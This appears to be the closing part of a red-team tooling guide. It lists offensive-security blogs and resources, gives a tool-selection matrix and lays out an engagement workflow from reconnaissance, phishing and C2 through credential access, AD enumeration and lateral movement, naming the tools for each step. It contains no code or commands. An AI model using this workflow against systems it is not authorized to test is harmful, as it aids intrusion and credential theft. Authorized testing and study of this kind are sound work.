| MDSec Blog | MDSec team | Evasion, C2, advanced tradecraft |
| HarmJ0y’s Blog | Will Schroeder | AD security, Kerberos, GhostPack |
| Rastamouse Blog | Rastamouse | C# tradecraft, Cobalt Strike, evasion |
| Red Team Notes | 0xdf, others | TTP references, cheat sheets |
| ired.team | @spotheplanet | Red team & offensive security notes |
| ADSecurity.org | Sean Metcalf | Active Directory security deep dives |
| The DFIR Report | DFIR team | Real-world intrusion analysis & TTPs |
| Outflank Blog | Outflank team | EDR evasion, offensive research |
Community Resources
- MITRE ATT&CK — The framework that maps adversary tactics and techniques; essential for planning and reporting.
- Atomic Red Team — A library of small, focused tests mapped to ATT&CK techniques for validating detection coverage.
- C2 Matrix — A spreadsheet comparing C2 frameworks across dozens of features (maintained by @thec2matrix).
- PayloadsAllTheThings — A community-maintained list of useful payloads and bypass techniques for various platforms.
- HackTricks — Comprehensive pentesting wiki covering Linux, Windows, AD, web, cloud, and mobile.
- LOLBAS Project — Documents Living Off the Land Binaries, Scripts, and Libraries on Windows.
- GTFOBins — Curated list of Unix binaries that can be exploited to bypass local security restrictions.
Tool Selection Decision Matrix
When choosing tools for an engagement, consider these factors:
| Factor | Question to Ask |
|---|---|
| OPSEC requirements | How stealthy does this need to be? Will the tool trigger known signatures? |
| Target environment | Windows/Linux/Cloud? What EDR/AV is deployed? |
| Team familiarity | Does the team know this tool well enough to troubleshoot under pressure? |
| Licensing | Is a commercial license required? Is use authorized for this engagement? |
| Detection surface | What artifacts does this tool leave? Are those artifacts monitored? |
| Community support | Is the tool actively maintained? Are there known issues? |
| Integration | Does it work with the team’s existing C2 and reporting infrastructure? |
General Workflow
Recon (Amass, Subfinder, Shodan)
→ Initial Access (GoPhish, Evilginx2, SET)
→ C2 Establishment (Sliver, Mythic, Cobalt Strike)
→ Host Enumeration (Seatbelt, SharpUp)
→ Credential Access (Mimikatz, Rubeus, Certipy)
→ AD Enumeration (SharpHound, PowerView, BloodHound)
→ Lateral Movement (CrackMapExec, Evil-WinRM, Impacket)
→ Privilege Escalation (Certipy, Rubeus, SharpUp)
→ Objective Completion & ReportingRemember: Tools are only as effective as the operator. Understanding the underlying techniques — not just running the commands — is what separates a capable red team from a script-running exercise. Invest in training, practice in labs, and always understand what a tool does before deploying it on an engagement.